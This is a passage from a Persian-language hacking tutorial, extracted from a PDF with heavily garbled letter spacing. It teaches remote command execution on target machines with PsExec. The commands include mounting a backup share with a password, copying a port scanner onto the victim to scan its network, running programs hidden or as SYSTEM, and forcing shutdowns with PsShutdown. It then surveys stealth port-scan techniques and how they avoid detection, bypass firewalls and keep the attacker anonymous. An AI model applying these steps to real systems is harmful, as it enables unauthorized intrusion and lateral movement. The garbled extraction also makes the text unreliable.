ﻟﻴﻨﻮﮐﺲ هﯽ ‪ ،‬ﭼﭗ ﻣﻴﺮﻧﺪ راﺱﺖ ﻣﻴﺮﻧﺪ و… ﺏﺮای ﺷﻤﺎ " ﻗﻤﭙﺾ " ﻣﯽ ﺕﺮﮐﺎﻧﺪﻧﺪ را ﺱﺮ ﺟﺎیﺸﺎن ﺏﻨﺸﺎﻧﯽ ﭘﺴﺮم!! "‪.‬‬ ‫اﻟﺒﺘ ﻪ زی ﺎد ذوق زدﻩ ﻧ ﺸﻮیﺪ ﭼ ﻮن دﺱﺘﺮﺱ ﯽ ﺏ ﻪ ﻣﻨﺒ ﻊ ﻣ ﺸﺘﺮک ‪ ADMIN$‬و ﻋﺒ ﻮر از ﻣ ﺎﻧﻊ اﺡ ﺮاز هﻮی ﺖ ﺏ ﻪ ﻣﻨﻈ ﻮر اﺟ ﺮای ای ﻦ ﺏﺮﻧﺎﻣ ﻪ از‬ ‫ﺽﺮوریﺎت اﺱﺖ‪ .‬ایﻦ ﺏﺮﻧﺎﻣﻪ یﮏ ﮐﻤﯽ " هﺎ ﻟﻮ " ﻣﻴﺰﻧﻪ ﭼﻮن هﻤﻴﺸﻪ ﻓﮑﺮ ﻣﻴﮑﻨﺪ ﻣﺎ ﻣﻴﺨﻮاهﻴﻢ از ﺁن ﺏﺮای اﺱﺘﻔﺎدﻩ از راﻩ دور اﺱ ﺘﻔﺎدﻩ ﮐﻨ ﻴﻢ از ای ﻦ‬ ‫رو ﺕﻌﻴ ﻴﻦ ﺁرﮔﻮﻣ ﺎن ‪ computer name‬در اﻟﮕ ﻮی ﻋﻤ ﻮﻣﯽ اﺱ ﺘﻔﺎدﻩ از ای ﻦ ﻓﺮﻣ ﺎن اﻣ ﺮی واﺟ ﺐ اﺱ ﺖ‪ .‬ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ از ﺱ ﻮیﭻ ‪ –u‬و ‪ –p‬ﻣﻴﺘ ﻮان ﻧ ﺎم‬ ‫ﮐﺎرﺏﺮی و ﮐﻠﻤﻪ ﻋﺒﻮر را وارد ﮐﺮد‪ .‬ﻣﺜﺎل‪:‬‬ ‫‪C :\> psexec.exe \\xxx.xxx.xxx.xxx cmd/c dir‬‬ ‫در اﺱﺘﻔﺎدﻩ از ایﻦ اﺏﺰار ﻣﺴﻴﺮ اﺟﺮای ﻓﺮﻣﺎن ﻣﻮرد ﻧﻈﺮ ﺏﻪ ﻃﻮر ﭘﻴﺶ ﻓﺮض ‪ %SYSTEMROOT%\System32‬اﺱﺖ‪.‬‬ ‫ﻣﺜﺎل هﺎی ﺏﻴﺸﺘﺮ ‪:‬‬ ‫‪C :\> psexec.exe \\xxx.xxx.xxx.xxx ipconfig/all‬‬ ‫‪C :\> psexec.exe \\xxx.xxx.xxx.xxx net use * \\yyy.yyy.yyy.yyy\backups Rch! ve/u: backup‬‬ ‫‪C :\> psexec.exe \\xxx.xxx.xxx.xxx c:\cygwin\usr\sbin\sshd‬‬ ‫اﮔﺮ ﻧﺎم یﺎ ﻣﺴﻴﺮ دارای ﺟﺎی ﺧﺎﻟﯽ ﺏﺎﺷﺪ ﺏﺎیﺪ ﺁن را درون " " ﻗﺮار دهﻴﺪ ‪.‬‬ ‫اﮔﺮ ﻣﺴﻴﺮ را درﺱﺖ ﺏﻠﺪ ﻧﻴﺴﺘﻴﺪ ﻣﻴﺘﻮاﻧﻴﺪ ﺏﺎ اﺽﺎﻓﻪ ﮐﺮدن ﺱﻮیﭻ ‪ –c‬و یﺎ ‪ –f‬ﻣﺸﮑﻞ ﺧﻮد را ﺡ ﻞ ﮐﻨﻴ ﺪ ‪.‬ﺏ ﺎ ای ﻦ روش اول ﺏﺮﻧﺎﻣ ﻪ ی ﮏ ﮐﭙ ﯽ از ﻧ ﺴﺨﻪ‬ ‫ﺧﻮد در ﺁﻧﺠﺎ ) ‪ ( %SYSTEMROOT%\System32‬درﺱﺖ ﻣﯽ ﮐﻨﺪ‪ .‬ﺱﻮیﭻ ‪ –f‬در ﺻﻮرت وﺟﺪ ﺏﺮﻧﺎﻣﻪ ﻣﻮرد ﻧﻈ ﺮ در ﺁﻧﺠ ﺎ ﻧ ﺴﺨﻪ ﺁن را ﺏ ﺎ‬ ‫ﻧﺴﺨﻪ ارﺱﺎﻟﯽ ﻋﻮض ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫یﮏ ﻣﺜﺎل ﻣﻴﺰﻧﻢ راﻩ ﮐﺎر ﺁن دﺱﺖ ﺧﻮدﺕﺎن ﺏﻴﺎد‪ .‬در ﻣﺜﺎل زیﺮ ﭘﺲ از ﺏﺎر ﮔﺬاری ﺏﺮﻧﺎﻣﻪ ای ﺏ ﺎ ﻋﻨ ﻮان ‪ ) fscan‬ﺏﻌ ﺪا ﺏ ﻪ ﻃ ﻮر ﮐﺎﻣ ﻞ ﺕﻮﺽ ﻴﺢ ﻣﻴ ﺪهﻢ‬ ‫درﺏﺎرﻩ اش ( ﺏﺮ روی ﺱﻴﺴﺘﻢ هﺪف‪ .‬ﻓﺮایﻨﺪ اﺱﮑﻦ ﭘﻮرت هﺎی ﺱﻴﺴﺘﻤﻬﺎی واﻗﻊ ﺏﺮ روی ﺷﺒﮑﻪ ﮐﻼس ‪ C‬ﻣﻘﺼﺪ را اﻧﺠﺎم ﻣﻴﺪهﺪ‪.‬‬ ‫‪C :\> psexec.exe \\xxx.xxx.xxx.xxx –c fscan.exe q bpl-10001 –o targets.txt 192.168.0.1- 192.168.0.255‬‬ ‫ﺏﺎ ایﻦ روش ﻣﻴﺘﻮاﻧﻴﺪ هﺮ ﺏﺮﻧﺎﻣﻪ ) ازﺟﻤﻠﻪ ﺕﻤﺎم ﺏﺮﻧﺎﻣﻪ هﺎی ‪ ( Pstools‬را روی ﻣﺎﺷﻴﻦ ﻃﺮف ﺏﺮیﺰیﺪ و اﺟﺮا ﮐﻨﻴﺪ ‪.‬‬ ‫ﺱﻮیﭻ ‪ D‬ﺏﺎﻋﺚ ﻣﺨﻔﯽ اﺟﺮا ﺷﺪن ﺏﺮﻧﺎﻣﻪ ﻣﻴﺸﻮد ‪.‬‬ ‫ﺱﻮیﭻ ‪ S‬ﺏﺮای اﺱﺘﻔﺎدﻩ در ﻗﺎﻟﺐ یﮏ ﺡﺴﺎب ﺱﻴﺴﺘﻤﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد‪.‬‬ ‫ﺱﻮیﭻ ‪ I‬ﺏﺎﻋﺚ ﻣﻴﺸﻮد دﺱﺖ یﺎﺏﯽ ﻣﺤﺎورﻩ ای ﺏﻪ ﺱﻴﺴﺘﻢ ﭘﻴﺪا ﮐﻨﻴﻢ ‪.‬در ﻣﻮرد ﺏﺮﻧﺎﻣﻪ هﺎی ﻣﺜﻞ ‪ FTP‬ﮐﻪ ﻧﻴﺎز ﺏﻪ ﮐﻠﻤﻪ ﻋﺒﻮر دارد اﺱﺘﻔﺎدﻩ ﻣﻴﺸﻮد‪.‬‬ ‫اﺏﺰار ‪: PsShutdown‬‬ ‫ﺁﺧﺮیﻦ اﺏﺰار ایﻦ ﻣﺠﻤﻮﻋﻪ اﺏﺰار ‪ PsShutdown‬اﺱﺖ‪.‬‬ ‫ﮐ ﺎر ای ﻦ اﺏ ﺰار دﻗﻴﻘ ﺎ ﺷ ﺒﻴﻪ اﺏ ﺰار ‪ shutdown‬در ﻣﺠﻤﻮﻋ ﻪ ‪ windows Resource‬اﺱ ﺖ‪ .‬ای ﻦ اﺏ ﺰار ﻗ ﺎدر اﺱ ﺖ ﺱﻴ ﺴﺘﻤﯽ را ﺧ ﺎﻣﻮش و ی ﺎ از‬ ‫ﺧﺎﻣﻮش ﺷﺪن ﺁن ﺟﻠﻮﮔﻴﺮی ﮐﻨﺪ و یﺎ ﻟﺤﻈﻪ ای یﮏ ﺱﻴﺴﺘﻢ را ﺧﺎﻣﻮش ﮐﻨﺪ و‪...‬‬ ‫ﺏ ﺮای ﺧ ﺎﻣﻮش ﮐ ﺮدن ﻧﺎﮔﻬ ﺎﻧﯽ ﻣﺎﺷ ﻴﻦ ه ﺪف از ﺱ ﻮیﭻ ‪ –f‬اﺱ ﺘﻔﺎدﻩ ﻣ ﯽ ﮐﻨ ﻴﻢ‪ .‬ای ﻦ ﺱ ﻮیﭻ ﻣ ﺴﺎوی ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ ﺕ ﻮام دو ﺱ ﻮیﭻ ‪ c‬و‪ y‬در ﻧ ﺮم اﻓ ﺰار‬ ‫‪ shutdown‬در ﻣﺠﻤﻮﻋﻪ ‪ windows Resource‬اﺱﺖ‪.‬‬ ‫ﺏﻘﻴﻪ اش دیﮕﻪ ﺕﺎﺏﻠﻮ ﺧﻮدﺕﺎن ﺕﺠﺮﺏﻪ ﮐﻨﻴﺪ !!!‪.‬‬ ‫ﺧﻮب ﺕﺎ ﺏﻪ ﺡﺎل اﮐﺜﺮ ﻧﺮم اﻓﺰارهﺎی ﻣﻬﻢ ﺟﻤﻊ ﺁوری اﻃﻼﻋﺎت ﻣﻘﺪﻣﺎﺕﯽ را ﻣﻌﺮﻓﯽ ﮐﺮدم در ایﻦ ﺏﺎب ی ﮏ ﮐ ﺎر دیﮕ ﺮ ه ﻢ اﺱ ﺖ ﮐ ﻪ اﻟﺒﺘ ﻪ ﺧﻴﻠ ﯽ ﻣﻬ ﻢ‬ ‫اﺱﺖ و ﺁن اﺱﮑﻦ ﭘﻮرت هﺎ ﺏﺮای ﺏﺪﺱﺖ ﺁوردن ﻟﻴﺴﺖ ﭘﻮرت هﺎی ﺏ ﺎز و ﺱﺮوی ﺴﻬﺎی ﺁن و‪ ...‬ﺧ ﻮب اول ﻣ ﻦ ی ﮏ ﻧﻤ ﺎی ﮐﻠ ﯽ در ﺏ ﺎرﻩ اﻧ ﻮاع اﺱ ﮑﻦ‬ ‫ﮐﺮدن ﭘﻮرت هﺎ ﺏﻪ ﺷﻤﺎ ﻣﻴﺪهﻢ ﺕﺎ ﺏﻌﺪ ﺏﺮﺱﻴﻢ ﺱﺮ ﻣﻌﺮﻓﯽ و ﺁﻣﻮزش ﭼﮕﻮﻧﮕﯽ اﺱﺘﻔﺎدﻩ از ﻧﺮم اﻓﺰارهﺎی ﻣﺮﺏﻮﻃﻪ ‪.‬‬

‫ﮔﺎم دوم‬ ‫اﻧﻮاع ﺵﻴﻮﻩ هﺎی ﺟﺴﺘﺠﻮی ﭘﻮرت ‪:‬‬ ‫‪ -١‬ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ و یﺎ اﺻﻄﻼﺡﺎ ) ‪: ( Polite Scan‬‬ ‫در ایﻦ ﻣﮑﺎﻧﻴﺰم ﻧﺮم اﻓﺰار ﭘﻮیﺸﮕﺮ ﭘﻮرت ی ﮏ ارﺕﺒ ﺎط ﮐﺎﻣ ﻞ و ﺱ ﻪ ﻣﺮﺡﻠ ﻪ ای ‪ TCP‬ﺏ ﺎ ی ﮏ ﺷ ﻤﺎرﻩ ﭘ ﻮرت ﺧ ﺎص ﺏﺮﻗ ﺮار ﻣ ﯽ ﻧﻤﺎی ﺪ‪ .‬ﺧ ﻮب اﮔ ﺮ‬ ‫ارﺕﺒﺎط وﺻﻞ ﺷﻮد ﭘﺲ ﭘﻮرت ﻣﺮﺏﻮﻃﻪ ﺏﺎز اﺱﺖ‪ ) .‬ﭘﺲ ﺡﺘﻤﺎ ﺱﺮویﺴﯽ وﺟﺪ داﺷﺘﻪ ﮐﻪ ایﻦ ﭘﻮرت ﺏﺎز ﮐﺮدﻩ (‪.‬‬ ‫ﭼﻮن ایﻦ ﻋﻤﻞ ﮐﺎﻣﻼ ﻗﺎﻧﻮﻧﯽ ) از ﻧﻈﺮ ﭘﺮوﺕﮑﻞ ‪ ( TCP‬اﺱﺖ و یﮏ روال ﻃﺒﻴﻌﯽ دارد اﺡﺘﻤﺎل ﺁﻧﮑﻪ ﻣﺎﺷﻴﻦ هﺪف دﭼﺎر اﺧﺘﻼل ﺷﻮد وﺟﻮد ﻧﺪارد ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٧‬‬

‫اﻟﺒﺘﻪ ﺏﻪ دﻻیﻠﯽ اﺱﺘﻔﺎدﻩ از ایﻦ ﺷﻴﻮﻩ اﺡﺘﻤﺎل ﻟﻮ رﻓﺘﻦ ﺷﻤﺎ ﺏﺴﻴﺎر زیﺎد ﻣﻴﺸﻮد و زﻣﺎن زیﺎدی ﺱﺮف ای ﻦ ﺱ ﻪ ﻣﺮﺡﻠ ﻪ دﺱ ﺖ ﺕﮑ ﺎﻧﯽ ﻣﻴ ﺸﻮد ‪،‬اﻟﺒﺘ ﻪ ﻧﺘ ﺎیﺞ‬ ‫ﮐﺎﻣﻼ ﻗﺎﺏﻞ اﻃﻤﻴﻨﺎن اﺱﺖ‪.‬‬ ‫روﻧﺪ ﮐﺎری ﺏﻪ ﺻﻮرت زیﺮ اﺱﺖ در ﺏﻴﺶ از ‪ %٩۵‬از ﻧﺮم اﻓﺰار هﺎی ﭘﻮیﺸﮕﺮ ﭘﻮرت‪.‬‬ ‫• یﮏ ﺏﺴﺘﻪ ‪ SYN‬ﺏﻪ ﺱﻤﺖ ﻣﺎﺷﻴﻦ هﺪف ﻓﺮﺱﺘﺎدﻩ ﺷﺪﻩ‪.‬‬ ‫• ﻧﺮم اﻓﺰار ﺏﻪ ﻣﺪت ﻣﺸﺨﺼﯽ ﮐﻪ اﻟﺒﺘﻪ ﻣﻌﻤﻮﻻ ﻗﺎﺏﻞ ﺕﻨﻈﻴﻢ اﺱﺖ ﻣﻨﺘﻈﺮ ﺟ ﻮاب ‪ SYN-ACK‬ﻣﻴ ﺸﻮد ﺕ ﺎ ﺏﺮﮔ ﺮدد‪ .‬اﮔ ﺮ ﺟ ﻮاب دریﺎﻓ ﺖ ﺷ ﺪ‬ ‫ﭘﺲ ﭘﻮرت ﺏﺎز ﺏﻮدﻩ در ﻏﻴﺮ ایﻦ ﺻﻮرت " اﺡﺘﻤﺎﻻ " ﻧﻪ ‪ %١٠٠‬ﻣﻴﺸﻮد ﮔﻔﺖ ﮐﻪ ﺏﺴﺘﻪ اﺱﺖ ایﻦ ﭘﻮرت ‪.‬‬ ‫• اﮔﺮ ﭘﻮرت ﺏﺎز ﺏﺎﺷﺪ ﻣﺮﺡﻠﻪ ﺱﻮم دﺱﺖ ﺕﮑﺎﻧﯽ اﻧﺠﺎم ﻣﯽ ﺷﻮد ﺏﺎ ﻓﺮﺱﺘﺎدن یﮏ ﺏﺴﺘﻪ ‪. ACK‬‬ ‫• ﺧﻮب ﺡﺎﻻ ﭼﻮن ﭘﻮرت ﺏﺎزﻩ و ﻣﺎ ﺕﺎ ﺡﺎﻻ ایﻦ ﻧﺮم اﻓﺰار هﺮ ﮐﺎری ﮐﺮدﻩ ﺏﺮای ارﺕﺒﺎط ﺏﺎ ﺁن ﻣﺎﺷﻴﻦ ﺏﻮدﻩ وﻟﯽ ﻣﺎ ﻓﻘﻂ ﻣﻴﺨﻮاﺱ ﺘﻴﻢ ﺏﺒﻴﻨ ﻴﻢ ای ﻦ‬ ‫در ﺏﺎزﻩ یﺎ ﻧﻪ ‪ ،‬ﻧﻪ ایﻨﮑﻪ ﺏﻪ هﻢ وﺻﻞ ﺷﻮیﻢ ﭘﺲ ﻧﺮم اﻓﺰار ﺏﺎ ﻓﺮﺱﺘﺎدن یﮏ ﺏﺴﺘﻪ ‪ FIN=1‬ارﺕﺒﺎط ﭘﺎیﺎن ﻣﻴﺪهﺪ‪.‬‬ ‫‪ -٢‬ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ ) ‪: ( TCP SYN Scan‬‬ ‫در ایﻦ ﻣﮑﺎﻧﻴﺰم یﺎ ﺷﻴﻮﻩ دو ﻣﺮﺡﻠﻪ از دﺱﺖ ﺕﮑﺎﻧﯽ اﻧﺠﺎم ﻣﯽ ﺷﻮد و روش اﻣﻦ ﺕﺮی اﺱﺖ ﻧﺴﺒﺖ ﺏﻪ ﺷﻴﻮﻩ ﻗﺒﻠﯽ و اﻟﺒﺘﻪ ﺱﺮﻋﺖ ﺁن ﺏﻴﺸﺘﺮ اﺱﺖ ﻧﺴﺒﺖ‬ ‫ﺏﻪ ﺷﻴﻮﻩ اول دارای ﻣﺮاﺡﻞ زیﺮ اﺱﺖ ‪:‬‬ ‫• یﮏ ﺏﺴﺘﻪ ‪ SYS‬ﺏﺮای هﺪف ﻣﻴﻔﺮﺱﺘﺪ‪.‬‬ ‫• زﻣﺎن ﻣﺸﺨﺼﯽ ﺏﺮای ﺟﻮاب ﺻﺒﺮ ﻣﯽ ﮐﻨﺪ ﺕﺎ ﺏﺒﻴﻨﺪ ﺏﺴﺘﻪ ‪ SYN-ACK‬در ﺟﻮاب ﻣﯽ ﺁیﺪ یﺎ ﻧﻪ ‪.‬اﮔﺮ ﺟﻮاب ﺁﻣﺪ ﮐﻪ یﻌﻨﯽ ﭘﻮرت ﺏﺎز اﺱﺖ‪.‬‬ ‫• ﺏﺎ ﺏﺎز ﮔﺸﺖ ﺟﻮاب )‪ ( SYN-ACK‬ﻧﺮم اﻓﺰار ﺱﺮیﻌﺎ ﺏﺴﺘﻪ ‪ RESET‬را ﺏﺮای هﺪف ﻣﻴﻔﺮﺱﺘﺪ و هﻴﭻ ارﺕﺒﺎﻃﯽ ﺏﻪ وﺟﺪ ﻧﻤﯽ ﺁیﺪ ‪.‬‬ ‫‪ -٣‬ﭘﻮیﺶ ﺏﻪ روش ﻧﻘﺾ اﺻﻮل ﭘﺮوﺕﮑﻞ ‪. TCP‬‬ ‫در دو روش ﻗﺒﻠﯽ ﻋﻤﻞ ﭘﻮیﺶ ﺏﺮ ﭘﺎیﻪ ﻓﺮﺱﺘﺎدن یﮏ ﺏﺴﺘﻪ ‪ SYS‬و اﻧﺘﻈ ﺎر ﺏ ﺮای دریﺎﻓ ﺖ ﺏ ﺴﺘﻪ ‪ SYN-ACK‬اﺱ ﺘﻮار ﺏ ﻮد‪ .‬در ای ﻦ ﺱ ﻪ روش از‬ ‫ﺏﺴﺘﻪ هﺎی اﺱﺘﻔﺎدﻩ ﻣﯽ ﺷﻮد ﮐﻪ در ﺡﺎﻟﺖ ﻋﺎدی هﻴﭻ وﻗﺖ یﮏ دﻓﻌﻪ ﻓﺮﺱﺘﺎدﻩ ﻧﻤﯽ ﺷﻮد‪.‬‬ ‫ایﻦ روش ﺱﻪ ﻣﮑﺎﻧﻴﺰم یﺎ ﺷﻴﻮﻩ دارد ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ‪.‬‬ ‫‪: TCP FIN Scan -٣-١‬‬ ‫ﺏﻪ ﻃﻮر ﮐﻠﯽ ﺏﺴﺘﻪ هﺎی ‪ TCP FIN‬ﺏﺮای ﺧﺎﺕﻤﻪ یﮏ ارﺕﺒﺎط ‪ TCP‬ارﺱﺎل ﻣﯽ ﺷﻮد ‪.‬و هﻤﺎن ﻃﻮر ﮐﻪ " دوﮔﻮﻟﻪ " ﺡﮑﻢ ﻣﻴﮑﻨﺪ یﮏ دﻓﻌ ﻪ ای ﻦ ﺏ ﺴﺘﻪ‬ ‫را ﺏﺮای ﺷﺮوع ارﺕﺒﺎط ﻧﻤﯽ ﻓﺮﺱﺘﻨﺪ ‪.‬در ایﻦ ﺷﻴﻮﻩ ﺡﮑﻢ دوﮔﻮﻟﻪ را ﺏﺮ ﻋﮑﺲ ﮐﺮدﻩ و ﺕﺎ ﺏﻌﺪ ﺏﻪ ﺏﻴﻨ ﻴﻢ ﭼ ﻪ ﻣﻴ ﺸﻮد ‪ .‬ﻃﺒ ﻖ ﻗﻮاﻋ ﺪ ﭘﺮوﺕﮑ ﻞ اﮔ ﺮ ﭘ ﻮرﺕﯽ‬ ‫ﺏﺎز ﺏﺎﺷﺪ و ایﻦ ﺏﺴﺘﻪ را ﺏﺮایﺶ ﺏﻔﺮﺱﺘﻴﻢ هﻴﭻ ﺟﻮاﺏﯽ ﻧﻤﯽ دهﺪ ﭘﺲ ﻣﺎ اﺡﺘﻤﺎل زیﺎد ﺏﺎ ﻋﺪم دریﺎﻓ ﺖ ﺟ ﻮاب ﭘ ﯽ ﻣﻴﺒ ﺮیﻢ ﭘ ﻮرت ﺏ ﺎز اﺱ ﺖ اﻣ ﺎ اﮔ ﺮ ی ﮏ‬ ‫ﭘﻮرت ﺏﺴﺘﻪ یﮏ هﻤﭽﻴﻦ ﺏﺴﺘﻪ ای ﺏﻔﺮﺱﺘﻴﻢ ﺏﺎیﺪ ﻣﺎﺷﯽ هﺪف ﺏﺮای ﻣﺎ ﺟﻮاب ‪ RESET‬ﺏﻔﺮﺱﺘﺪ ﭘﺲ ﻣﺎ ﭘﯽ ﻣﻴﺒﺮیﻢ ایﻦ ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ ‪.‬‬ ‫‪: NULL Scan -٣-٢‬‬ ‫ایﻦ هﻢ یﮏ ﻣﮑﺎﻧﻴﺰم ﺏﺮ ﺧﻼف ﺡﮑﻢ دوﮔﻮﻟﻪ اﺱﺖ‪ .‬ایﻦ ﺏﺎر ﺏﺮﻧﺎﻣﻪ ﻣﻮرد ﻧﻈﺮ ﺏﺪون ﺏﺮﻗﺮاری ارﺕﺒﺎط ﺏﺎ ﻣﺎﺷﻴﻦ هﺪف ی ﮏ دﻓﻌ ﻪ ﺏ ﺮای ﻣﺎﺷ ﻴﻦ ه ﺪف‬ ‫یﮏ ﺏﺴﺘﻪ ‪ TCP‬ﺏﺎ ﺷﻤﺎرﻩ ﭘﻮرت ﻣﺸﺨﺺ ﺏﺮای یﮏ ﭘﻮرت ﺧﺎص ارﺱﺎل ﻣﯽ ﮐﻨﺪ‪ .‬ایﻦ ﺏﺴﺘﻪ دارای ویﮋﮔﯽ هﺎی اﺱ ﺖ ﮐ ﻪ ﺏﻴﺘﻬ ﺎی ‪ SYS‬و ‪ FIN‬و‬ ‫‪ ACK‬ﺁن ‪ ١‬ﻧﻴﺴﺖ ﭘﺲ یﮏ ﺏﺴﺘﻪ ﺏﯽ ﻣﻌﻨﯽ اﺱﺖ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﻗﻮاﻧﻴﻦ ﭘﺮوﺕﮑﻞ ‪ .‬وﻗﺘﯽ هﺪف ایﻦ ﺏﺴﺘﻪ در ﭘﻴﺖ ﻣﺎ را ﻣﻴﮕﻴﺮد اﮔﺮ ﭘ ﻮرت ﺏ ﺎز ﺏﺎﺷ ﺪ ﮐ ﻪ‬ ‫ﺏﺴﺘﻪ را ﺡﺬف ﻣﻴﮑﻨﺪ اﮔﺮ ﭘﻮرت ﺏﺴﺘﻪ ﺏﺎﺷﺪ یﮏ ﭘﺎﺱﺦ ) ی ﮏ ﺏ ﺴﺘﻪ ‪ ( RESET‬ﺏ ﻪ ﻣ ﺎ ﻣﻴﺪه ﺪ‪ .‬ﭘ ﺲ ﻣ ﺎ ﻧﺘﻴﺠ ﻪ ﻣﻴﮕﻴ ﺮیﻢ اﮔ ﺮ ﺟ ﻮاب در یﺎﻓ ﺖ ﻧﮑ ﺮدیﻢ‬ ‫ﭘﻮرت ﺏﺎز اﺱﺖ اﮔﺮ دریﺎﻓﺖ ﮐﺮدیﻢ ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪.‬‬ ‫‪: Xmas Tree -٣-٣‬‬ ‫در ایﻦ ﻣﮑﺎﻧﻴﺰم ‪ ،‬ﮐﻪ ﮐﺎﻣﻼ ﺏﺮﻋﮑﺲ ﺏﺎﻻ اﺱﺖ از ﻧﻈﺮ ﻗﻮاﻧﻴﻦ ﭘﺮوﺕﮑﻞ ﻣﺎ ی ﮏ ﺏ ﺴﺘﻪ ‪ TCP‬ﺏ ﺮای ه ﺪف ﻣﻴﻔﺮﺱ ﺘﻴﻢ ﮐ ﻪ ﻓﻴﻠ ﺪ ه ﺎی ‪ FIN‬و‪ URG‬و‬ ‫‪ PUSH‬را ﺏﺎ ‪ ١‬ﭘﺮ ﮐﺮدﻩ ایﻢ ایﻦ هﻢ از ﻧﻈﺮ ﭘﺮوﺕﮑﻞ اﻟﺒﺘﻪ ﻗﻮاﻧﻴﻦ ﺁن یﮏ ﺏﺴﺘﻪ ﺏﯽ ﻣﻌﻨﯽ اﺱﺖ ﭘﺲ ﭘﻮرت ﺏﺎز ﺏ ﺴﺘﻪ را ﺡ ﺬف ﻣﻴﮑﻨ ﺪ و ﭘ ﻮرت ﺏ ﺴﺘﻪ‬ ‫یﮏ ﺟﻮاب ‪ RESET‬ﺏﻪ ﻣﺎ ﻣﻴﺪهﺪ ‪.‬‬ ‫یﮏ ﻧﮑﺘﻪ ﺧﻴﻠﯽ ﻣﻬﻢ ‪:‬‬ ‫ﺧﻮب ایﻦ روش هﺎ ) ﻧﻘﺾ اﺻﻮل ﭘﺮوﺕﮑﻞ ( ﺷﺎیﺪ ﺧﻴﻠﯽ ﺟﺎﻟﺐ ﺏﺎﺷﺪ اﻣﺎ ﻓﻘﻂ ﺏﺮای ﺱﻴﺴﺘﻢ هﺎی ﻏﻴﺮ ویﻨﺪوز ﮐﺎرایﯽ دارد ﭼﻮن وﻗﺘ ﯽ ﺏ ﺮای ویﻨ ﺪوز‬ ‫هﺎ از ایﻦ ﺏﺴﺘﻪ هﺎ ﺏﻔﺮﺱﺘﻴﺪ در هﺮ ﺡﺎﻟﺘﯽ ﺟﻮاب ‪ RESET‬ﺏﺮای ﻣﺎ ﺡﻮاﻟﻪ ﻣﯽ ﮐﻨﺪ ‪.‬‬ ‫‪ -۴‬ﭘﻮیﺶ ﺏﻪ روش ‪: TCP ACK Scan‬‬ ‫ایﻦ ﻣﮑﺎﻧﻴﺰم یﺎ ﺷﻴﻮﻩ ﺕﻘﺮیﺒﺎ ﺷﺒﻴﻪ ﺱﻪ ﻣﮑﺎﻧﻴﺰم ﺏﺎﻻ اﺱﺖ ﺏﺎ ایﻦ ﺕﻔﺎوت ﮐﻪ یﮏ دﻓﻌﻪ یﮏ ﺏﺴﺘﻪ ‪ ACK‬ﺏﺮای هﺪف ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ) ایﻦ ﺏ ﺴﺘﻪ ﻣﻌﻤ ﻮﻻ‬ ‫در ﺟﻮاب ﺏﺴﺘﻪ ‪ SYS‬ﻓﺮﺱ ﺘﺎدﻩ ﻣ ﯽ ﺷ ﻮد ( ﺧ ﻮب ﺏ ﻪ ای ﻦ ﺕﺮﺕﻴ ﺐ وﻗﺘ ﯽ ﻣﺎﺷ ﻴﻦ ه ﺪف ی ﮏ دﻓﻌ ﻪ از ای ﻦ ﻧ ﻮع ﺏ ﺴﺘﻪ دریﺎﻓ ﺖ ﻣ ﯽ ﮐﻨ ﺪ ﭼ ﻮن ه ﻴﭻ در‬ ‫ﺧﻮاﺱﺘﯽ ﻧﻔﺮﺱﺘﺎدﻩ ﺏﻮدﻩ ﮐﻪ ﭼﻴﺰی ﺏﺨﻮاهﺪ ﺏﮕﻴﺮد ﺱﺮویﺲ دهﻨﺪﻩ ﺁن ﭘﻮرت ای ﻦ ﺏ ﺴﺘﻪ را ﺡ ﺬف ﻣﻴﮑﻨ ﺪ ﮐ ﻪ ﭘ ﺲ ﺏ ﺎ ای ﻦ روش دریﺎﻓ ﺖ ﻧﮑ ﺮدن ﺟ ﻮاب‬ ‫اﺡﺘﻤﺎﻻ ﻧﺘﻴﺠﻪ ﻣﻴﺪهﺪ ﮐﻪ ﭘﻮرت ﺏﺎز اﺱﺖ اﮔﺮ ﭘﻮرت ﺏﺴﺘﻪ ﺏﺎﺷﺪ یﮏ ﺏﺴﺘﻪ ‪ RESET‬ﺏﺮای ﻧﺮم اﻓﺰار ﭘﻮیﺶ ﮐﻨﻨﺪﻩ ﻓﺮﺱ ﺘﺎدﻩ ﻣ ﯽ ﺷ ﻮد و ﻧ ﺮم اﻓ ﺰار ﺏ ﺎ‬ ‫دریﺎﻓﺖ ایﻦ ﺏﺴﺘﻪ ﭘﯽ ﻣﻴﺒﺮد ﮐﻪ ﭘﻮرت ﺏﺴﺘﻪ ﺷﺪﻩ اﺱﺖ‪.‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٢٨‬‬

‫ایﻦ ﻣﮑﺎﻧﻴﺰم ﺧ ﻮﺏﯽ اﺱ ﺖ ﭼ ﻮن ﻣ ﯽ ﺕ ﻮان ﺏ ﺎ ﺁن از ﻣ ﺴﻴﺮیﺎب ه ﺎی ﻓﻴﻠﺘ ﺮ ﮐﻨﻨ ﺪﻩ و دی ﻮار ﺁﺕ ﺶ ﻋﺒ ﻮر ﮐ ﺮد ‪ ،‬اﻣ ﺎ دو ﻣﮑ ﺎﻧﻴﺰم ‪ TCP SYS Scan‬و‬ ‫ﻣﮑﺎﻧﻴﺰم ‪ Polite Scan‬ایﻦ اﻣﮑﺎن را ﻧﺪارﻧﺪ‪.‬‬ ‫‪ -۵‬ﭘﻮیﺶ ﺏﻪ روش ‪: FTP bounce Scan‬‬ ‫ایﻦ از ﺁن روﺷﻬﺎی اﺱﺖ ﮐﻪ ﺷﻤﺎ ﻧﺎﺷﻨﺎس ﻣﻴﻤﺎﻧﻴ ﺪ و ای ﻦ ﻣﻬ 